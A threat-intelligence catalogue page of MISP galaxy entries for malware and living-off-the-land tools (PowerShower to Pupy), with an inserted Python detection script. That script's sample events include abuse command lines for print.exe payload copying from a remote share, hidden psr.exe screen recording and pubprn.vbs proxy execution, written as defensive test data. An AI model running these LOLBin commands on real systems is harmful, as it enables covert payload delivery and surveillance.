* C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe
* C:\Program Files\Microsoft Office\Office16\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe
* C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe
* C:\Program Files\Microsoft Office\Office15\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe
* C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe
* C:\Program Files\Microsoft Office\Office14\Powerpnt.exe
* C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe
* C:\Program Files\Microsoft Office\Office12\Powerpnt.exe

Resources:
* https://twitter.com/reegun21/status/1150032506504151040
* https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191

Detection:
* Sigma: proc_creation_win_lolbin_office.yml
* IOC: Suspicious Office application Internet/network traffic[Powerpnt.exe - LOLBAS Project]

Internal MISP references

UUID 155053be-8a2c-4d5e-8206-36d992c5651d which can be used as unique global reference for Powerpnt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5231
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

PowerPunch

PowerPunch is a lightweight downloader that has been used by Gamaredon Group since at least 2021.[Microsoft Actinium February 2022]

Internal MISP references

UUID e7cdaf70-5e28-442a-b34d-894484788dc5 which can be used as unique global reference for PowerPunch in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0685
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

PowerShower

PowerShower is a PowerShell backdoor used by Inception for initial reconnaissance and to download and execute second stage payloads.[Unit 42 Inception November 2018][Kaspersky Cloud Atlas August 2019]

Internal MISP references

UUID 2ca245de-77a9-4857-ba93-fd0d6988df9d which can be used as unique global reference for PowerShower in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0441
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

POWERSOURCE

POWERSOURCE is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. [FireEye FIN7 March 2017] [Cisco DNSMessenger March 2017]

Internal MISP references

UUID a4700431-6578-489f-9782-52e394277296 which can be used as unique global reference for POWERSOURCE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0145
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

PowerSploit

PowerSploit is an open source, offensive security framework composed of PowerShell modules and scripts that perform a wide range of penetration-testing tasks such as code execution, persistence, bypassing anti-virus, reconnaissance, and exfiltration. [GitHub PowerSploit May 2012] [PowerShellMagazine PowerSploit July 2014] [PowerSploit Documentation]

Internal MISP references

UUID 82fad10d-c921-4a87-a533-49def83d002b which can be used as unique global reference for PowerSploit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0194
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['tool']
Related clusters

To see the related clusters, click here.

PowerStallion

PowerStallion is a lightweight PowerShell backdoor used by Turla, possibly as a recovery access tool to install other backdoors.[ESET Turla PowerShell May 2019]

Internal MISP references

UUID 837bcf97-37a7-4001-a466-306574fd7890 which can be used as unique global reference for PowerStallion in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0393
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

POWERSTATS

POWERSTATS is a PowerShell-based first stage backdoor used by MuddyWater. [Unit 42 MuddyWater Nov 2017]

Internal MISP references

UUID 39fc59c6-f1aa-4c93-8e43-1f41563e9d9e which can be used as unique global reference for POWERSTATS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0223
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

POWERTON

POWERTON is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by APT33. At least two variants of the backdoor have been identified, with the later version containing improved functionality.[FireEye APT33 Guardrail]

Internal MISP references

UUID b3c28750-3825-4e4d-ab92-f39a6b0827dd which can be used as unique global reference for POWERTON in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0371
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

PowerTool

PowerTool is a tool used to remove rootkits, as well as to detect, analyze, and fix kernel structure modifications.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID b8a101e4-e0d2-4002-94c6-18ea30da7aa7 which can be used as unique global reference for PowerTool in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5039
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

PowGoop

PowGoop is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by MuddyWater as their main loader.[DHS CISA AA22-055A MuddyWater February 2022][CYBERCOM Iranian Intel Cyber January 2022]

Internal MISP references

UUID 7ed984bb-d098-4d0a-90fd-b03e68842479 which can be used as unique global reference for PowGoop in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1046
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

POWRUNER

POWRUNER is a PowerShell script that sends and receives commands to and from the C2 server. [FireEye APT34 Dec 2017]

Internal MISP references

UUID 67cdb7a6-5142-43fa-8b8d-d9bdd2a4dae4 which can be used as unique global reference for POWRUNER in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0184
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Presentationhost

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: File is used for executing Browser applications

Author: Oddvar Moe

Paths: * C:\Windows\System32\Presentationhost.exe * C:\Windows\SysWOW64\Presentationhost.exe

Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

Detection: * Sigma: proc_creation_win_lolbin_presentationhost_download.yml * Sigma: proc_creation_win_lolbin_presentationhost.yml * IOC: Execution of .xbap files may not be common on production workstations[Presentationhost.exe - LOLBAS Project]

Internal MISP references

UUID 8127f51d-dce0-405a-a785-83883ba19c23 which can be used as unique global reference for Presentationhost in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5141
source Tidal Cyber
tags ['0661bf1f-76ec-490c-937a-efa3f02bc59b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Prestige

Prestige ransomware has been used by Sandworm Team since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.[Microsoft Prestige ransomware October 2022]

Internal MISP references

UUID 4fb5b109-5a5c-5441-a0f9-f639ead5405e which can be used as unique global reference for Prestige in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1058
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Prikormka

Prikormka is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. [ESET Operation Groundbait]

Internal MISP references

UUID 1da989a8-41cc-4e89-a435-a88acb72ae0d which can be used as unique global reference for Prikormka in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0113
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

Print

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to send files to the printer

Author: Oddvar Moe

Paths: * C:\Windows\System32\print.exe * C:\Windows\SysWOW64\print.exe

Resources: * https://twitter.com/Oddvarmoe/status/985518877076541440 * https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410

Detection: * Sigma: proc_creation_win_print_remote_file_copy.yml * IOC: Print.exe retrieving files from internet * IOC: Print.exe creating executable files on disk[Print.exe - LOLBAS Project]

Internal MISP references

UUID 8ad4945d-6c54-4472-a476-906a9860fb82 which can be used as unique global reference for Print in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5142
source Tidal Cyber
tags ['01aca077-8cfb-4d1d-9b83-3678cd26f050', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

PrintBrm

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Printer Migration Command-Line Tool

Author: Elliot Killick

Paths: * C:\Windows\System32\spool\tools\PrintBrm.exe

Resources: * https://twitter.com/elliotkillick/status/1404117015447670800

Detection: * Sigma: proc_creation_win_lolbin_printbrm.yml * IOC: PrintBrm.exe should not be run on a normal workstation[PrintBrm.exe - LOLBAS Project]

Internal MISP references

UUID 93ec2323-f93b-4d21-9930-f367948187f0 which can be used as unique global reference for PrintBrm in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5143
source Tidal Cyber
tags ['37a70ca8-a027-458c-9a48-7e0d307462be', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ProcDump

ProcDump is a tool used to monitor applications for CPU spikes and generate crash dumps.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 0d6e00a3-6237-458a-85e5-1128bd7f4f50 which can be used as unique global reference for ProcDump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5036
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c3eaf8a7-06e5-4e3a-9615-36316d9e10a8', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Process Hacker

Process Hacker is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID d390ea7d-0995-4069-924d-65d6c7c98e3c which can be used as unique global reference for Process Hacker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5040
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

ProLock

ProLock is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with QakBot. ProLock is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.[Group IB Ransomware September 2020]

Internal MISP references

UUID c8af096e-c71e-4751-b203-70c285b7a7bd which can be used as unique global reference for ProLock in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0654
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

ProtocolHandler

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Office binary

Author: Nir Chako

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe

Resources: None Provided

Detection: * Sigma: proc_creation_win_lolbin_protocolhandler_download.yml * IOC: Suspicious Office application Internet/network traffic[ProtocolHandler.exe - LOLBAS Project]

Internal MISP references

UUID 2ecf8041-8069-41a0-b6e8-5b328ae69e31 which can be used as unique global reference for ProtocolHandler in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5232
source Tidal Cyber
tags ['77131d00-b8b2-42ef-afbd-1fbfc12729df', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Proton

Proton is a macOS backdoor focusing on data theft and credential access.[objsee mac malware 2017]

Internal MISP references

UUID d3bcdbc4-5998-4e50-bd45-cba6a3278427 which can be used as unique global reference for Proton in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0279
source MITRE
type ['malware']

Provlaunch

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Launcher process

Author: Grzegorz Tworek

Paths: * c:\windows\system32\provlaunch.exe

Resources: * https://twitter.com/0gtweet/status/1674399582162153472

Detection: * Sigma: proc_creation_win_provlaunch_potential_abuse.yml * Sigma: proc_creation_win_provlaunch_susp_child_process.yml * Sigma: proc_creation_win_registry_provlaunch_provisioning_command.yml * Sigma: registry_set_provisioning_command_abuse.yml * IOC: c:\windows\system32\provlaunch.exe executions * IOC: Creation/existence of HKLM\SOFTWARE\Microsoft\Provisioning\Commands subkeys[Provlaunch.exe - LOLBAS Project]

Internal MISP references

UUID 83e1ac24-3928-40ba-b701-d72549a9430c which can be used as unique global reference for Provlaunch in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5144
source Tidal Cyber
tags ['9e5ec91c-0d0f-4e40-846d-d7b7eb941e17', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Proxysvc

Proxysvc is a malicious DLL used by Lazarus Group in a campaign known as Operation GhostSecret. It appears to have operated undetected since 2017 and was observed mostly in higher education organizations. The goal of Proxysvc is to deliver additional payloads to the target and to maintain control for the attacker. It takes the form of a DLL that can also be executed as a standalone process. [McAfee GhostSecret]

Internal MISP references

UUID 94f43629-243e-49dc-8c2b-cdf4fc15cf83 which can be used as unique global reference for Proxysvc in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0238
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

PS1

PS1 is a loader that was used to deploy 64-bit backdoors in the CostaRicto campaign.[BlackBerry CostaRicto November 2020]

Internal MISP references

UUID 8cd401ac-a233-4395-a8ae-d75db9d5b845 which can be used as unique global reference for PS1 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0613
source MITRE
type ['malware']

PsExec

PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.[Russinovich Sysinternals][SANS PsExec]

Internal MISP references

UUID 73eb32af-4bd3-4e21-8048-355edc55a9c6 which can be used as unique global reference for PsExec in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0029
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '5cd85fec-0e37-4892-9cd2-bb8c70139072', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '950e8d3a-044b-43e3-b5db-bba61f70ff51', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Psr

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Problem Steps Recorder, used to record screen and clicks.

Author: Leon Rodenko

Paths: * c:\windows\system32\psr.exe * c:\windows\syswow64\psr.exe

Resources: * https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx

Detection: * Sigma: proc_creation_win_psr_capture_screenshots.yml * IOC: psr.exe spawned * IOC: suspicious activity when running with "/gui 0" flag[Psr.exe - LOLBAS Project]

Internal MISP references

UUID 1945584b-bb16-48a2-902d-2a1c9591efcd which can be used as unique global reference for Psr in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5145
source Tidal Cyber
tags ['08f4ef8d-94bb-42f7-b76d-71bcc809bcc9', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Psylo

Psylo is a shellcode-based Trojan that has been used by Scarlet Mimic. It has characteristics similar to FakeM. [Scarlet Mimic Jan 2016]

Internal MISP references

UUID 8c35d349-2f70-4edb-8668-e1cc2b67e4a0 which can be used as unique global reference for Psylo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0078
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Pteranodon

Pteranodon is a custom backdoor used by Gamaredon Group. [Palo Alto Gamaredon Feb 2017]

Internal MISP references

UUID 7fed4276-807e-4656-95f5-90878b6e2dbb which can be used as unique global reference for Pteranodon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0147
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Pubprn

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Proxy execution with Pubprn.vbs

Author: Oddvar Moe

Paths: * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs

Resources: * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://github.com/enigma0x3/windows-operating-system-archaeology

Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_pubprn.yml[Pubprn.vbs - LOLBAS Project]

Internal MISP references

UUID 58883c83-d5be-42fc-b4bd-9287e55cd499 which can be used as unique global reference for Pubprn in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5260
source Tidal Cyber
tags ['8177e8ac-f80d-477d-b0af-c2ea243ddf00', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.
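The LOLBAS entries on this page (Presentationhost, Print, PrintBrm, ProtocolHandler, Provlaunch, Psr and Pubprn) each name the Sigma rules and the indicators a defender would key on. The following is an added example, not code from the LOLBAS project or from Tidal Cyber, that turns those indicators into one detection pass over constructed Sysmon-style process-creation and registry events. The Sigma rule names and IOC strings are copied from the entries above; the event field names, the host_role attribute used to separate workstations from print servers, the command-line shapes in the sample events and the matching predicates are this example's assumptions, and a real Sigma rule may match more broadly or narrowly than the predicates here.

```python
import re
from typing import Callable

# Each rule: (page entry, Sigma rule the page names, predicate, page IOC text).
# The predicates are this example's reading of the page's IOCs.
Rule = tuple[str, str, Callable[[dict], bool], str]


def _image_is(ev: dict, basename: str) -> bool:
    return ev.get("image", "").lower().rsplit("\\", 1)[-1] == basename


def _cmd(ev: dict) -> str:
    return ev.get("command_line", "").lower()


PROCESS_RULES: list[Rule] = [
    ("Presentationhost", "proc_creation_win_lolbin_presentationhost.yml",
     lambda e: _image_is(e, "presentationhost.exe") and ".xbap" in _cmd(e),
     "Execution of .xbap files may not be common on production workstations"),
    ("Print", "proc_creation_win_print_remote_file_copy.yml",
     lambda e: _image_is(e, "print.exe")
     and ("://" in _cmd(e) or "\\\\" in _cmd(e)) and ".exe" in _cmd(e),
     "Print.exe retrieving files from internet / creating executable files on disk"),
    ("PrintBrm", "proc_creation_win_lolbin_printbrm.yml",
     lambda e: _image_is(e, "printbrm.exe") and e.get("host_role") == "workstation",
     "PrintBrm.exe should not be run on a normal workstation"),
    ("ProtocolHandler", "proc_creation_win_lolbin_protocolhandler_download.yml",
     lambda e: _image_is(e, "protocolhandler.exe") and "://" in _cmd(e),
     "Suspicious Office application Internet/network traffic"),
    ("Provlaunch", "proc_creation_win_provlaunch_potential_abuse.yml",
     lambda e: _image_is(e, "provlaunch.exe"),
     "c:\\windows\\system32\\provlaunch.exe executions"),
    ("Psr", "proc_creation_win_psr_capture_screenshots.yml",
     lambda e: _image_is(e, "psr.exe") and re.search(r"/gui\s+0\b", _cmd(e)) is not None,
     'suspicious activity when running with "/gui 0" flag'),
    ("Pubprn", "proc_creation_win_lolbin_pubprn.yml",
     lambda e: (_image_is(e, "cscript.exe") or _image_is(e, "wscript.exe"))
     and "pubprn.vbs" in _cmd(e),
     "Proxy execution with Pubprn.vbs"),
]

# Registry IOC from the Provlaunch entry, compared against a Sysmon-style TargetObject.
PROVISIONING_COMMANDS = "hklm\\software\\microsoft\\provisioning\\commands\\"


def evaluate(events: list[dict]) -> list[dict]:
    """Return one alert per (event, rule) match over process-creation and
    registry events shaped like Sysmon Event ID 1 and 12/13 records."""
    alerts = []
    for ev in events:
        if ev.get("event") == "registry_set":
            if ev.get("target_object", "").lower().startswith(PROVISIONING_COMMANDS):
                alerts.append({"entry": "Provlaunch",
                               "sigma": "registry_set_provisioning_command_abuse.yml",
                               "ioc": "Creation/existence of HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands subkeys",
                               "host": ev.get("host"), "detail": ev.get("target_object")})
            continue
        for entry, sigma, matches, ioc in PROCESS_RULES:
            if matches(ev):
                alerts.append({"entry": entry, "sigma": sigma, "ioc": ioc,
                               "host": ev.get("host"), "detail": ev.get("command_line")})
    return alerts


def _proc(host: str, role: str, image: str, command_line: str) -> dict:
    return {"event": "process_create", "host": host, "host_role": role,
            "image": image, "command_line": command_line}


# Constructed events (not from any real incident). The command lines are
# plausible invocations chosen only to exercise the rules above.
SAMPLE_EVENTS = [
    _proc("WS-042", "workstation", r"C:\Windows\System32\psr.exe",
          r"psr.exe /start /gui 0 /output C:\Users\Public\rec.zip"),
    _proc("WS-042", "workstation", r"C:\Windows\System32\print.exe",
          r"print /D:C:\Users\Public\out.exe \\10.0.0.5\share\payload.txt"),
    _proc("WS-042", "workstation", r"C:\Windows\System32\spool\tools\PrintBrm.exe",
          r"PrintBrm.exe -r -f C:\Users\Public\p.printerExport"),
    _proc("PRINT-01", "server", r"C:\Windows\System32\spool\tools\PrintBrm.exe",
          r"PrintBrm.exe -b -f D:\backup\p.printerExport"),  # admin use on a print server: not flagged
    _proc("WS-042", "workstation", r"C:\Windows\System32\Presentationhost.exe",
          r"presentationhost.exe C:\Users\Public\app.xbap"),
    _proc("WS-042", "workstation", r"C:\Windows\System32\cscript.exe",
          r"cscript.exe //nologo C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 x"),
    _proc("WS-042", "workstation", r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign
    {"event": "registry_set", "host": "WS-042",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Provisioning\Commands\Example\Cmd"},
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f'{a["host"]}: {a["entry"]} ({a["sigma"]}) -> {a["detail"]}')
```

Matching on the image basename rather than the full path keeps the rules valid for both the System32 and SysWOW64 copies listed in the entries, and the host_role check on PrintBrm.exe is what keeps a legitimate printer migration on a print server out of the alert queue.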

Pulseway

According to joint Cybersecurity Advisory AA23-320A (November 2023), Pulseway is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]

Internal MISP references

UUID 74eb97b8-fc2c-41f0-b497-aad08a52777e which can be used as unique global reference for Pulseway in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5068
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

PUNCHBUGGY

PUNCHBUGGY is a backdoor malware used by FIN8 that has been observed targeting POS networks in the hospitality industry. [Morphisec ShellTea June 2019][FireEye Fin8 May 2016] [FireEye Know Your Enemy FIN8 Aug 2016]

Internal MISP references

UUID d8999d60-3818-4d75-8756-8a55531254d8 which can be used as unique global reference for PUNCHBUGGY in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0196
source MITRE
tags ['6c6c0125-9631-4c2c-90ab-cfef374d5198']
type ['malware']
Related clusters

To see the related clusters, click here.

PUNCHTRACK

PUNCHTRACK is non-persistent point of sale (POS) system malware utilized by FIN8 to scrape payment card data. [FireEye Fin8 May 2016] [FireEye Know Your Enemy FIN8 Aug 2016]

Internal MISP references

UUID 1638d99b-fbcf-40ec-ac48-802ce5be520a which can be used as unique global reference for PUNCHTRACK in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0197
source MITRE
tags ['6c6c0125-9631-4c2c-90ab-cfef374d5198']
type ['malware']
Related clusters

To see the related clusters, click here.

Pupy

Pupy is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. [GitHub Pupy] It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). [GitHub Pupy] Pupy is publicly available on GitHub. [GitHub Pupy]
